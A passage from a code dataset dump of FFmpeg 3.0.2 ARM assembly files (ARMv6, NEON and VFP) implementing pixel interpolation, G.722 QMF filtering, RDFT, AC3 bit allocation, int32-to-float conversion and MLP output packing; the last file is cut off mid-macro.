repo_id
stringlengths 5
115
| size
int64 590
5.01M
| file_path
stringlengths 4
212
| content
stringlengths 590
5.01M
|
|---|---|---|---|
Akagi201/ffmpeg-xcode
| 8,770
|
ffmpeg-3.0.2/libavcodec/arm/hpeldsp_armv6.S
|
/*
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro call_2x_pixels type, subp
function ff_\type\()_pixels16\subp\()_armv6, export=1
push {r0-r3, lr}
bl X(ff_\type\()_pixels8\subp\()_armv6)
pop {r0-r3, lr}
add r0, r0, #8
add r1, r1, #8
b X(ff_\type\()_pixels8\subp\()_armv6)
endfunc
.endm
call_2x_pixels avg
call_2x_pixels put, _x2
call_2x_pixels put, _y2
call_2x_pixels put, _x2_no_rnd
call_2x_pixels put, _y2_no_rnd
function ff_put_pixels16_armv6, export=1
push {r4-r11}
1:
ldr r5, [r1, #4]
ldr r6, [r1, #8]
ldr r7, [r1, #12]
ldr_post r4, r1, r2
strd r6, r7, [r0, #8]
ldr r9, [r1, #4]
strd_post r4, r5, r0, r2
ldr r10, [r1, #8]
ldr r11, [r1, #12]
ldr_post r8, r1, r2
strd r10, r11, [r0, #8]
subs r3, r3, #2
strd_post r8, r9, r0, r2
bne 1b
pop {r4-r11}
bx lr
endfunc
function ff_put_pixels8_armv6, export=1
push {r4-r7}
1:
ldr r5, [r1, #4]
ldr_post r4, r1, r2
ldr r7, [r1, #4]
strd_post r4, r5, r0, r2
ldr_post r6, r1, r2
subs r3, r3, #2
strd_post r6, r7, r0, r2
bne 1b
pop {r4-r7}
bx lr
endfunc
function ff_put_pixels8_x2_armv6, export=1
push {r4-r11, lr}
mov r12, #1
orr r12, r12, r12, lsl #8
orr r12, r12, r12, lsl #16
1:
ldr r4, [r1]
subs r3, r3, #2
ldr r5, [r1, #4]
ldr r7, [r1, #5]
lsr r6, r4, #8
ldr_pre r8, r1, r2
orr r6, r6, r5, lsl #24
ldr r9, [r1, #4]
ldr r11, [r1, #5]
lsr r10, r8, #8
add r1, r1, r2
orr r10, r10, r9, lsl #24
eor r14, r4, r6
uhadd8 r4, r4, r6
eor r6, r5, r7
uhadd8 r5, r5, r7
and r14, r14, r12
and r6, r6, r12
uadd8 r4, r4, r14
eor r14, r8, r10
uadd8 r5, r5, r6
eor r6, r9, r11
uhadd8 r8, r8, r10
and r14, r14, r12
uhadd8 r9, r9, r11
and r6, r6, r12
uadd8 r8, r8, r14
strd_post r4, r5, r0, r2
uadd8 r9, r9, r6
strd_post r8, r9, r0, r2
bne 1b
pop {r4-r11, pc}
endfunc
function ff_put_pixels8_y2_armv6, export=1
push {r4-r11}
mov r12, #1
orr r12, r12, r12, lsl #8
orr r12, r12, r12, lsl #16
ldr r4, [r1]
ldr r5, [r1, #4]
ldr_pre r6, r1, r2
ldr r7, [r1, #4]
1:
subs r3, r3, #2
uhadd8 r8, r4, r6
eor r10, r4, r6
uhadd8 r9, r5, r7
eor r11, r5, r7
and r10, r10, r12
ldr_pre r4, r1, r2
uadd8 r8, r8, r10
and r11, r11, r12
uadd8 r9, r9, r11
ldr r5, [r1, #4]
uhadd8 r10, r4, r6
eor r6, r4, r6
uhadd8 r11, r5, r7
and r6, r6, r12
eor r7, r5, r7
uadd8 r10, r10, r6
and r7, r7, r12
ldrc_pre ne, r6, r1, r2
uadd8 r11, r11, r7
strd_post r8, r9, r0, r2
it ne
ldrne r7, [r1, #4]
strd_post r10, r11, r0, r2
bne 1b
pop {r4-r11}
bx lr
endfunc
function ff_put_pixels8_x2_no_rnd_armv6, export=1
push {r4-r9, lr}
1:
subs r3, r3, #2
ldr r4, [r1]
ldr r5, [r1, #4]
ldr r7, [r1, #5]
ldr_pre r8, r1, r2
ldr r9, [r1, #4]
ldr r14, [r1, #5]
add r1, r1, r2
lsr r6, r4, #8
orr r6, r6, r5, lsl #24
lsr r12, r8, #8
orr r12, r12, r9, lsl #24
uhadd8 r4, r4, r6
uhadd8 r5, r5, r7
uhadd8 r8, r8, r12
uhadd8 r9, r9, r14
stm r0, {r4,r5}
add r0, r0, r2
stm r0, {r8,r9}
add r0, r0, r2
bne 1b
pop {r4-r9, pc}
endfunc
function ff_put_pixels8_y2_no_rnd_armv6, export=1
push {r4-r9, lr}
ldr r4, [r1]
ldr r5, [r1, #4]
ldr_pre r6, r1, r2
ldr r7, [r1, #4]
1:
subs r3, r3, #2
uhadd8 r8, r4, r6
ldr_pre r4, r1, r2
uhadd8 r9, r5, r7
ldr r5, [r1, #4]
uhadd8 r12, r4, r6
ldrc_pre ne, r6, r1, r2
uhadd8 r14, r5, r7
it ne
ldrne r7, [r1, #4]
stm r0, {r8,r9}
add r0, r0, r2
stm r0, {r12,r14}
add r0, r0, r2
bne 1b
pop {r4-r9, pc}
endfunc
function ff_avg_pixels8_armv6, export=1
pld [r1, r2]
push {r4-r10, lr}
mov lr, #1
orr lr, lr, lr, lsl #8
orr lr, lr, lr, lsl #16
ldrd r4, r5, [r0]
ldr r10, [r1, #4]
ldr_post r9, r1, r2
subs r3, r3, #2
1:
pld [r1, r2]
eor r8, r4, r9
uhadd8 r4, r4, r9
eor r12, r5, r10
ldrd_reg r6, r7, r0, r2
uhadd8 r5, r5, r10
and r8, r8, lr
ldr r10, [r1, #4]
and r12, r12, lr
uadd8 r4, r4, r8
ldr_post r9, r1, r2
eor r8, r6, r9
uadd8 r5, r5, r12
pld [r1, r2, lsl #1]
eor r12, r7, r10
uhadd8 r6, r6, r9
strd_post r4, r5, r0, r2
uhadd8 r7, r7, r10
beq 2f
and r8, r8, lr
ldrd_reg r4, r5, r0, r2
uadd8 r6, r6, r8
ldr r10, [r1, #4]
and r12, r12, lr
subs r3, r3, #2
uadd8 r7, r7, r12
ldr_post r9, r1, r2
strd_post r6, r7, r0, r2
b 1b
2:
and r8, r8, lr
and r12, r12, lr
uadd8 r6, r6, r8
uadd8 r7, r7, r12
strd_post r6, r7, r0, r2
pop {r4-r10, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 2,332
|
ffmpeg-3.0.2/libavcodec/arm/g722dsp_neon.S
|
/*
* ARM NEON optimised DSP functions for G722 coding
* Copyright (c) 2015 Peter Meerwald <pmeerw@pmeerw.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_g722_apply_qmf_neon, export=1, align=4
movrel r3, qmf_coeffs
vld1.s16 {d2,d3,d4}, [r0]! /* load prev_samples */
vld1.s16 {d16,d17,d18}, [r3,:64]! /* load qmf_coeffs */
vmull.s16 q0, d2, d16
vmlal.s16 q0, d3, d17
vmlal.s16 q0, d4, d18
vld1.s16 {d5,d6,d7}, [r0]! /* load prev_samples */
vld1.s16 {d19,d20,d21}, [r3,:64]! /* load qmf_coeffs */
vmlal.s16 q0, d5, d19
vmlal.s16 q0, d6, d20
vmlal.s16 q0, d7, d21
vadd.s32 d0, d1, d0
vrev64.32 d0, d0
vst1.s32 {d0}, [r1]
bx lr
endfunc
const qmf_coeffs, align=4
.hword 3
.hword -11
.hword -11
.hword 53
.hword 12
.hword -156
.hword 32
.hword 362
.hword -210
.hword -805
.hword 951
.hword 3876
.hword 3876
.hword 951
.hword -805
.hword -210
.hword 362
.hword 32
.hword -156
.hword 12
.hword 53
.hword -11
.hword -11
.hword 3
endconst
|
Akagi201/ffmpeg-xcode
| 6,515
|
ffmpeg-3.0.2/libavcodec/arm/rdft_neon.S
|
/*
* ARM NEON optimised RDFT
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_rdft_calc_neon, export=1
push {r4-r8,lr}
ldr r6, [r0, #4] @ inverse
mov r4, r0
mov r5, r1
lsls r6, r6, #31
bne 1f
add r0, r4, #20
bl X(ff_fft_permute_neon)
add r0, r4, #20
mov r1, r5
bl X(ff_fft_calc_neon)
1:
ldr r12, [r4, #0] @ nbits
mov r2, #1
lsl r12, r2, r12
add r0, r5, #8
add r1, r5, r12, lsl #2
lsr r12, r12, #2
ldr r2, [r4, #12] @ tcos
sub r12, r12, #2
ldr r3, [r4, #16] @ tsin
mov r7, r0
sub r1, r1, #8
mov lr, r1
mov r8, #-8
vld1.32 {d0}, [r0,:64]! @ d1[0,1]
vld1.32 {d1}, [r1,:64], r8 @ d2[0,1]
vld1.32 {d4}, [r2,:64]! @ tcos[i]
vld1.32 {d5}, [r3,:64]! @ tsin[i]
vmov.f32 d18, #0.5 @ k1
vdup.32 d19, r6
pld [r0, #32]
veor d19, d18, d19 @ k2
vmov.i32 d16, #0
vmov.i32 d17, #1<<31
pld [r1, #-32]
vtrn.32 d16, d17
pld [r2, #32]
vrev64.32 d16, d16 @ d16=1,0 d17=0,1
pld [r3, #32]
2:
veor q1, q0, q8 @ -d1[0],d1[1], d2[0],-d2[1]
vld1.32 {d24}, [r0,:64]! @ d1[0,1]
vadd.f32 d0, d0, d3 @ d1[0]+d2[0], d1[1]-d2[1]
vld1.32 {d25}, [r1,:64], r8 @ d2[0,1]
vadd.f32 d1, d2, d1 @ -d1[0]+d2[0], d1[1]+d2[1]
veor q3, q12, q8 @ -d1[0],d1[1], d2[0],-d2[1]
pld [r0, #32]
vmul.f32 q10, q0, q9 @ ev.re, ev.im, od.im, od.re
pld [r1, #-32]
vadd.f32 d0, d24, d7 @ d1[0]+d2[0], d1[1]-d2[1]
vadd.f32 d1, d6, d25 @ -d1[0]+d2[0], d1[1]+d2[1]
vmul.f32 q11, q0, q9 @ ev.re, ev.im, od.im, od.re
veor d7, d21, d16 @ -od.im, od.re
vrev64.32 d3, d21 @ od.re, od.im
veor d6, d20, d17 @ ev.re,-ev.im
veor d2, d3, d16 @ -od.re, od.im
vmla.f32 d20, d3, d4[1]
vmla.f32 d20, d7, d5[1]
vmla.f32 d6, d2, d4[1]
vmla.f32 d6, d21, d5[1]
vld1.32 {d4}, [r2,:64]! @ tcos[i]
veor d7, d23, d16 @ -od.im, od.re
vld1.32 {d5}, [r3,:64]! @ tsin[i]
veor d24, d22, d17 @ ev.re,-ev.im
vrev64.32 d3, d23 @ od.re, od.im
pld [r2, #32]
veor d2, d3, d16 @ -od.re, od.im
pld [r3, #32]
vmla.f32 d22, d3, d4[0]
vmla.f32 d22, d7, d5[0]
vmla.f32 d24, d2, d4[0]
vmla.f32 d24, d23, d5[0]
vld1.32 {d0}, [r0,:64]! @ d1[0,1]
vld1.32 {d1}, [r1,:64], r8 @ d2[0,1]
vst1.32 {d20}, [r7,:64]!
vst1.32 {d6}, [lr,:64], r8
vst1.32 {d22}, [r7,:64]!
vst1.32 {d24}, [lr,:64], r8
subs r12, r12, #2
bgt 2b
veor q1, q0, q8 @ -d1[0],d1[1], d2[0],-d2[1]
vadd.f32 d0, d0, d3 @ d1[0]+d2[0], d1[1]-d2[1]
vadd.f32 d1, d2, d1 @ -d1[0]+d2[0], d1[1]+d2[1]
ldr r2, [r4, #8] @ sign_convention
vmul.f32 q10, q0, q9 @ ev.re, ev.im, od.im, od.re
add r0, r0, #4
bfc r2, #0, #31
vld1.32 {d0[0]}, [r0,:32]
veor d7, d21, d16 @ -od.im, od.re
vrev64.32 d3, d21 @ od.re, od.im
veor d6, d20, d17 @ ev.re,-ev.im
vld1.32 {d22}, [r5,:64]
vdup.32 d1, r2
vmov d23, d22
veor d2, d3, d16 @ -od.re, od.im
vtrn.32 d22, d23
veor d0, d0, d1
veor d23, d23, d17
vmla.f32 d20, d3, d4[1]
vmla.f32 d20, d7, d5[1]
vmla.f32 d6, d2, d4[1]
vmla.f32 d6, d21, d5[1]
vadd.f32 d22, d22, d23
vst1.32 {d20}, [r7,:64]
vst1.32 {d6}, [lr,:64]
vst1.32 {d0[0]}, [r0,:32]
vst1.32 {d22}, [r5,:64]
cmp r6, #0
it eq
popeq {r4-r8,pc}
vmul.f32 d22, d22, d18
vst1.32 {d22}, [r5,:64]
add r0, r4, #20
mov r1, r5
bl X(ff_fft_permute_neon)
add r0, r4, #20
mov r1, r5
pop {r4-r8,lr}
b X(ff_fft_calc_neon)
endfunc
|
Akagi201/ffmpeg-xcode
| 3,521
|
ffmpeg-3.0.2/libavcodec/arm/ac3dsp_armv6.S
|
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_ac3_bit_alloc_calc_bap_armv6, export=1
ldr r12, [sp]
cmp r12, #-960
beq 4f
push {r4-r11,lr}
add r5, sp, #40
movrelx r4, X(ff_ac3_bin_to_band_tab), r11
movrelx lr, X(ff_ac3_band_start_tab)
ldm r5, {r5-r7}
ldrb r4, [r4, r2]
add r1, r1, r2, lsl #1 @ psd + start
add r0, r0, r4, lsl #1 @ mask + band
add r4, r4, lr
add r7, r7, r2 @ bap + start
1:
ldrsh r9, [r0], #2 @ mask[band]
mov r8, #0xff0
sub r9, r9, r12 @ - snr_offset
ldrb r10, [r4, #1]! @ band_start_tab[++band]
subs r9, r9, r5 @ - floor
it lt
movlt r9, #0
cmp r10, r3 @ - end
and r9, r9, r8, lsl #1 @ & 0x1fe0
ite gt
subgt r8, r3, r2
suble r8, r10, r2
mov r2, r10
add r9, r9, r5 @ + floor => m
tst r8, #1
add r11, r7, r8
bne 3f
b 5f
2:
ldrsh r8, [r1], #2
ldrsh lr, [r1], #2
sub r8, r8, r9
sub lr, lr, r9
usat r8, #6, r8, asr #5 @ address
usat lr, #6, lr, asr #5
ldrb r8, [r6, r8] @ bap_tab[address]
ldrb lr, [r6, lr]
strb r8, [r7], #1 @ bap[bin]
strb lr, [r7], #1
5: cmp r7, r11
blo 2b
cmp r3, r10
bgt 1b
pop {r4-r11,pc}
3:
ldrsh r8, [r1], #2 @ psd[bin]
sub r8, r8, r9 @ - m
usat r8, #6, r8, asr #5 @ address
ldrb r8, [r6, r8] @ bap_tab[address]
strb r8, [r7], #1 @ bap[bin]
b 5b
4:
ldr r0, [sp, #12]
mov r1, #0
mov r2, #256
b X(memset)
endfunc
|
Akagi201/ffmpeg-xcode
| 7,436
|
ffmpeg-3.0.2/libavcodec/arm/fmtconvert_vfp.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/arm/asm.S"
/**
* ARM VFP optimised int32 to float conversion.
* Assume len is a multiple of 8, destination buffer is at least 4 bytes aligned
* (16 bytes alignment is best for BCM2835), little-endian.
*/
@ void ff_int32_to_float_fmul_array8_vfp(FmtConvertContext *c, float *dst, const int32_t *src, const float *mul, int len)
function ff_int32_to_float_fmul_array8_vfp, export=1
push {lr}
ldr a1, [sp, #4]
subs lr, a1, #3*8
bcc 50f @ too short to pipeline
@ Now need to find (len / 8) % 3. The approximation
@ x / 24 = (x * 0xAB) >> 12
@ is good for x < 4096, which is true for both AC3 and DCA.
mov a1, #0xAB
ldr ip, =0x03070000 @ RunFast mode, short vectors of length 8, stride 1
mul a1, lr, a1
vpush {s16-s31}
mov a1, a1, lsr #12
add a1, a1, a1, lsl #1
rsb a1, a1, lr, lsr #3
cmp a1, #1
fmrx a1, FPSCR
fmxr FPSCR, ip
beq 11f
blo 10f
@ Array is (2 + multiple of 3) x 8 floats long
@ drop through...
vldmia a3!, {s16-s23}
vldmia a4!, {s2,s3}
vldmia a3!, {s24-s31}
vcvt.f32.s32 s16, s16
vcvt.f32.s32 s17, s17
vcvt.f32.s32 s18, s18
vcvt.f32.s32 s19, s19
vcvt.f32.s32 s20, s20
vcvt.f32.s32 s21, s21
vcvt.f32.s32 s22, s22
vcvt.f32.s32 s23, s23
vmul.f32 s16, s16, s2
@ drop through...
3:
vldmia a3!, {s8-s15}
vldmia a4!, {s1}
vcvt.f32.s32 s24, s24
vcvt.f32.s32 s25, s25
vcvt.f32.s32 s26, s26
vcvt.f32.s32 s27, s27
vcvt.f32.s32 s28, s28
vcvt.f32.s32 s29, s29
vcvt.f32.s32 s30, s30
vcvt.f32.s32 s31, s31
vmul.f32 s24, s24, s3
vstmia a2!, {s16-s19}
vstmia a2!, {s20-s23}
2:
vldmia a3!, {s16-s23}
vldmia a4!, {s2}
vcvt.f32.s32 s8, s8
vcvt.f32.s32 s9, s9
vcvt.f32.s32 s10, s10
vcvt.f32.s32 s11, s11
vcvt.f32.s32 s12, s12
vcvt.f32.s32 s13, s13
vcvt.f32.s32 s14, s14
vcvt.f32.s32 s15, s15
vmul.f32 s8, s8, s1
vstmia a2!, {s24-s27}
vstmia a2!, {s28-s31}
1:
vldmia a3!, {s24-s31}
vldmia a4!, {s3}
vcvt.f32.s32 s16, s16
vcvt.f32.s32 s17, s17
vcvt.f32.s32 s18, s18
vcvt.f32.s32 s19, s19
vcvt.f32.s32 s20, s20
vcvt.f32.s32 s21, s21
vcvt.f32.s32 s22, s22
vcvt.f32.s32 s23, s23
vmul.f32 s16, s16, s2
vstmia a2!, {s8-s11}
vstmia a2!, {s12-s15}
subs lr, lr, #8*3
bpl 3b
vcvt.f32.s32 s24, s24
vcvt.f32.s32 s25, s25
vcvt.f32.s32 s26, s26
vcvt.f32.s32 s27, s27
vcvt.f32.s32 s28, s28
vcvt.f32.s32 s29, s29
vcvt.f32.s32 s30, s30
vcvt.f32.s32 s31, s31
vmul.f32 s24, s24, s3
vstmia a2!, {s16-s19}
vstmia a2!, {s20-s23}
vstmia a2!, {s24-s27}
vstmia a2!, {s28-s31}
fmxr FPSCR, a1
vpop {s16-s31}
pop {pc}
10: @ Array is (multiple of 3) x 8 floats long
vldmia a3!, {s8-s15}
vldmia a4!, {s1,s2}
vldmia a3!, {s16-s23}
vcvt.f32.s32 s8, s8
vcvt.f32.s32 s9, s9
vcvt.f32.s32 s10, s10
vcvt.f32.s32 s11, s11
vcvt.f32.s32 s12, s12
vcvt.f32.s32 s13, s13
vcvt.f32.s32 s14, s14
vcvt.f32.s32 s15, s15
vmul.f32 s8, s8, s1
b 1b
11: @ Array is (1 + multiple of 3) x 8 floats long
vldmia a3!, {s24-s31}
vldmia a4!, {s3}
vldmia a3!, {s8-s15}
vldmia a4!, {s1}
vcvt.f32.s32 s24, s24
vcvt.f32.s32 s25, s25
vcvt.f32.s32 s26, s26
vcvt.f32.s32 s27, s27
vcvt.f32.s32 s28, s28
vcvt.f32.s32 s29, s29
vcvt.f32.s32 s30, s30
vcvt.f32.s32 s31, s31
vmul.f32 s24, s24, s3
b 2b
50:
ldr lr, =0x03070000 @ RunFast mode, short vectors of length 8, stride 1
fmrx ip, FPSCR
fmxr FPSCR, lr
51:
vldmia a3!, {s8-s15}
vldmia a4!, {s0}
vcvt.f32.s32 s8, s8
vcvt.f32.s32 s9, s9
vcvt.f32.s32 s10, s10
vcvt.f32.s32 s11, s11
vcvt.f32.s32 s12, s12
vcvt.f32.s32 s13, s13
vcvt.f32.s32 s14, s14
vcvt.f32.s32 s15, s15
vmul.f32 s8, s8, s0
subs a1, a1, #8
vstmia a2!, {s8-s11}
vstmia a2!, {s12-s15}
bne 51b
fmxr FPSCR, ip
pop {pc}
endfunc
/**
* ARM VFP optimised int32 to float conversion.
* Assume len is a multiple of 8, destination buffer is at least 4 bytes aligned
* (16 bytes alignment is best for BCM2835), little-endian.
* TODO: could be further optimised by unrolling and interleaving, as above
*/
@ void ff_int32_to_float_fmul_scalar_vfp(float *dst, const int32_t *src, float mul, int len)
function ff_int32_to_float_fmul_scalar_vfp, export=1
VFP tmp .req a4
VFP len .req a3
NOVFP tmp .req a3
NOVFP len .req a4
NOVFP vmov s0, a3
ldr tmp, =0x03070000 @ RunFast mode, short vectors of length 8, stride 1
fmrx ip, FPSCR
fmxr FPSCR, tmp
1:
vldmia a2!, {s8-s15}
vcvt.f32.s32 s8, s8
vcvt.f32.s32 s9, s9
vcvt.f32.s32 s10, s10
vcvt.f32.s32 s11, s11
vcvt.f32.s32 s12, s12
vcvt.f32.s32 s13, s13
vcvt.f32.s32 s14, s14
vcvt.f32.s32 s15, s15
vmul.f32 s8, s8, s0
subs len, len, #8
vstmia a1!, {s8-s11}
vstmia a1!, {s12-s15}
bne 1b
fmxr FPSCR, ip
bx lr
endfunc
.unreq tmp
.unreq len
|
Akagi201/ffmpeg-xcode
| 15,536
|
ffmpeg-3.0.2/libavcodec/arm/mlpdsp_armv6.S
|
/*
* Copyright (c) 2014 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro loadregoffsh2 group, index, base, offgroup, offindex
.altmacro
loadregoffsh2_ \group, %(\index), \base, \offgroup, %(\offindex)
.noaltmacro
.endm
.macro loadregoffsh2_ group, index, base, offgroup, offindex
ldr \group\index, [\base, \offgroup\offindex, lsl #2]
.endm
.macro eorlslreg check, data, group, index
.altmacro
eorlslreg_ \check, \data, \group, %(\index)
.noaltmacro
.endm
.macro eorlslreg_ check, data, group, index
eor \check, \check, \data, lsl \group\index
.endm
.macro decr_modulo var, by, modulus
.set \var, \var - \by
.if \var == 0
.set \var, \modulus
.endif
.endm
.macro load_group1 size, channels, r0, r1, r2, r3, pointer_dead=0
.if \size == 2
ldrd \r0, \r1, [IN], #(\size + 8 - \channels) * 4
.else // size == 4
.if IDX1 > 4 || \channels==8
ldm IN!, {\r0, \r1, \r2, \r3}
.else
ldm IN, {\r0, \r1, \r2, \r3}
.if !\pointer_dead
add IN, IN, #(4 + 8 - \channels) * 4
.endif
.endif
.endif
decr_modulo IDX1, \size, \channels
.endm
.macro load_group2 size, channels, r0, r1, r2, r3, pointer_dead=0
.if \size == 2
.if IDX1 > 2
ldm IN!, {\r2, \r3}
.else
//A .ifc \r2, ip
//A .if \pointer_dead
//A ldm IN, {\r2, \r3}
//A .else
//A ldr \r2, [IN], #4
//A ldr \r3, [IN], #(\size - 1 + 8 - \channels) * 4
//A .endif
//A .else
ldrd \r2, \r3, [IN], #(\size + 8 - \channels) * 4
//A .endif
.endif
.endif
decr_modulo IDX1, \size, \channels
.endm
.macro implement_pack inorder, channels, shift
.if \inorder
.ifc \shift, mixed
CHECK .req a1
COUNT .req a2
IN .req a3
OUT .req a4
DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
SHIFT0 .req v5
SHIFT1 .req v6
SHIFT2 .req sl
SHIFT3 .req fp
SHIFT4 .req ip
SHIFT5 .req lr
.macro output4words
.set SIZE_GROUP1, IDX1
.if SIZE_GROUP1 > 4
.set SIZE_GROUP1, 4
.endif
.set SIZE_GROUP2, 4 - SIZE_GROUP1
load_group1 SIZE_GROUP1, \channels, DAT0, DAT1, DAT2, DAT3
load_group2 SIZE_GROUP2, \channels, DAT0, DAT1, DAT2, DAT3
.if \channels == 2
lsl DAT0, SHIFT0
lsl DAT1, SHIFT1
lsl DAT2, SHIFT0
lsl DAT3, SHIFT1
.elseif \channels == 6
.if IDX2 == 6
lsl DAT0, SHIFT0
lsl DAT1, SHIFT1
lsl DAT2, SHIFT2
lsl DAT3, SHIFT3
.elseif IDX2 == 2
lsl DAT0, SHIFT4
lsl DAT1, SHIFT5
lsl DAT2, SHIFT0
lsl DAT3, SHIFT1
.else // IDX2 == 4
lsl DAT0, SHIFT2
lsl DAT1, SHIFT3
lsl DAT2, SHIFT4
lsl DAT3, SHIFT5
.endif
.elseif \channels == 8
.if IDX2 == 8
uxtb SHIFT0, SHIFT4, ror #0
uxtb SHIFT1, SHIFT4, ror #8
uxtb SHIFT2, SHIFT4, ror #16
uxtb SHIFT3, SHIFT4, ror #24
.else
uxtb SHIFT0, SHIFT5, ror #0
uxtb SHIFT1, SHIFT5, ror #8
uxtb SHIFT2, SHIFT5, ror #16
uxtb SHIFT3, SHIFT5, ror #24
.endif
lsl DAT0, SHIFT0
lsl DAT1, SHIFT1
lsl DAT2, SHIFT2
lsl DAT3, SHIFT3
.endif
eor CHECK, CHECK, DAT0, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, DAT1, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
eor CHECK, CHECK, DAT2, lsr #8 - (\channels - IDX2)
eor CHECK, CHECK, DAT3, lsr #7 - (\channels - IDX2)
decr_modulo IDX2, 2, \channels
stm OUT!, {DAT0 - DAT3}
.endm
.set WORDS_PER_LOOP, \channels // calculate LCM (channels, 4)
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.if (WORDS_PER_LOOP % 2) == 0
.set WORDS_PER_LOOP, WORDS_PER_LOOP / 2
.endif
.set WORDS_PER_LOOP, WORDS_PER_LOOP * 4
.set SAMPLES_PER_LOOP, WORDS_PER_LOOP / \channels
function ff_mlp_pack_output_inorder_\channels\()ch_mixedshift_armv6, export=1
.if SAMPLES_PER_LOOP > 1
tst COUNT, #SAMPLES_PER_LOOP - 1 // always seems to be in practice
it ne
bne X(ff_mlp_pack_output) // but just in case, branch to C implementation if not
.endif
teq COUNT, #0
it eq
bxeq lr
push {v1-v6,sl,fp,lr}
ldr SHIFT0, [sp, #(9+1)*4] // get output_shift from stack
ldr SHIFT1, =0x08080808
ldr SHIFT4, [SHIFT0]
.if \channels == 2
uadd8 SHIFT4, SHIFT4, SHIFT1 // increase all shifts by 8
uxtb SHIFT0, SHIFT4, ror #0
uxtb SHIFT1, SHIFT4, ror #8
.else
ldr SHIFT5, [SHIFT0, #4]
uadd8 SHIFT4, SHIFT4, SHIFT1 // increase all shifts by 8
uadd8 SHIFT5, SHIFT5, SHIFT1
.if \channels == 6
uxtb SHIFT0, SHIFT4, ror #0
uxtb SHIFT1, SHIFT4, ror #8
uxtb SHIFT2, SHIFT4, ror #16
uxtb SHIFT3, SHIFT4, ror #24
uxtb SHIFT4, SHIFT5, ror #0
uxtb SHIFT5, SHIFT5, ror #8
.endif
.endif
.set IDX1, \channels
.set IDX2, \channels
0:
.rept WORDS_PER_LOOP / 4
output4words
.endr
subs COUNT, COUNT, #SAMPLES_PER_LOOP
bne 0b
pop {v1-v6,sl,fp,pc}
.ltorg
endfunc
.purgem output4words
.unreq CHECK
.unreq COUNT
.unreq IN
.unreq OUT
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq SHIFT0
.unreq SHIFT1
.unreq SHIFT2
.unreq SHIFT3
.unreq SHIFT4
.unreq SHIFT5
.else // not mixed
CHECK .req a1
COUNT .req a2
IN .req a3
OUT .req a4
